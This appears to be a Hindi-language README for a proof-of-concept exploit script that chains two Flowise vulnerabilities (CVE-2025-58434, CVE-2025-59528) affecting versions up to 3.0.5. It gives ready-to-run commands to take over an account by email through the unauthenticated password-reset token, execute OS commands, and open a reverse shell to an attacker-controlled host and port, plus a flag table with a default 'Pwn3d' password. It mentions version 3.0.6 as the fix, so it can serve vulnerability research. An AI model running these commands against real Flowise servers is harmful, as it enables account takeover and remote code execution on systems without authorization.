
CVE-2025-58434 और CVE-2025-59528 chain POC
दो कमजोरियों के लिए शोषण श्रृंखला जो Flowise <= 3.0.5 को प्रभावित करती हैं।
फ़ॉरगॉट-पासवर्ड एंडपॉइंट प्रमाणीकरण की आवश्यकता के बिना API प्रतिक्रिया में एक वैध पासवर्ड रीसेट टोकन लौटाता है। एक हमलावर जो एक वैध ईमेल पता जानता है, बिना उपयोगकर्ता के इंटरैक्शन के किसी भी खाते का पासवर्ड रीसेट कर सकता है।
CustomMCP नोड उपयोगकर्ता-नियंत्रित इनपुट को पूर्ण Node.js विशेषाधिकारों के साथ सीधे Function() कंस्ट्रक्टर को भेजता है। एक प्रमाणित उपयोगकर्ता जिसके पास वैध API कुंजी है, Flowise प्रक्रिया उपयोगकर्ता के रूप में मनमाने OS कमांड निष्पादित कर सकता है।
समाधान: Flowise 3.0.6
pip install requestsपूर्ण ATO श्रृंखला (पासवर्ड रीसेट करता है, API कुंजी के लिए संकेत देता है, रिवर्स शेल चलाता है):
python3 flowise_chain.py -t http://target -e [email protected]
केवल RCE (यदि आपके पास पहले से API कुंजी है):
python3 flowise_chain.py -t http://target --api-key <KEY> -c "id"
मौजूदा कुंजी के साथ रिवर्स शेल:
python3 flowise_chain.py -t http://target --api-key <KEY> --lhost 10.0.0.1 --lport 4444
Flowise 3.0.5 में एक ख़ासियत के कारण, रीसेट-पासवर्ड API एंडपॉइंट लॉगिन एंडपॉइंट द्वारा स्वीकार किए गए क्रेडेंशियल को तुरंत अपडेट नहीं करता है। स्क्रिप्ट रीसेट के बाद रुक जाती है और आपको मैन्युअल रूप से UI में लॉग इन करने और /apikey से API कुंजी कॉपी करने का संकेत देती है।
| फ़्लैग | विवरण |
|---|
-t, --target | लक्ष्य URL |
-e, --email | लक्ष्य खाता ईमेल (ATO श्रृंखला को ट्रिगर करता है) |
--api-key | सीधे API कुंजी प्रदान करें (ATO छोड़ें) |
-c, --command | निष्पादित करने के लिए कमांड |
--lhost | रिवर्स शेल के लिए हमलावर IP |
--lport | रिवर्स शेल के लिए हमलावर पोर्ट (डिफ़ॉल्ट: 4444) |
--new-password | रीसेट के दौरान सेट करने के लिए पासवर्ड (डिफ़ॉल्ट: Pwn3d!2026) |
-k, --insecure | TLS सत्यापन छोड़ें |